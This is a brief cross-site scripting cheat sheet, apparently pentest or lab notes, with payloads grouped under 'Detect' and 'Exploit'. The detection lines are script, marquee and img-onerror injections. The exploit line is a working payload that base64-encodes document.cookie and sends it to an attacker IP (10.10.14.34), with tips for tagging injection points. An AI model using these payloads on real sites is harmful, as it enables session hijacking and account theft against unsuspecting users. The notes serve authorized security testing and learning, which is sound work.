XSS (Cross-Site Scripting)
Detect
<script>alert(1)</script>
<marquee onstart=alert(1)>XSS</marquee>
<img/src/onerror=location.href='http://10.10.14.34/XSS123'>
Exploit
Example of stealing victim cookies and send them to attack with http.
Replace ABCD with something random for each field to identify the injection point (and avoid cache)
<img/src/onerror=location.href='http://10.10.14.34/ABCD'+encodeURI(btoa(document.cookie))>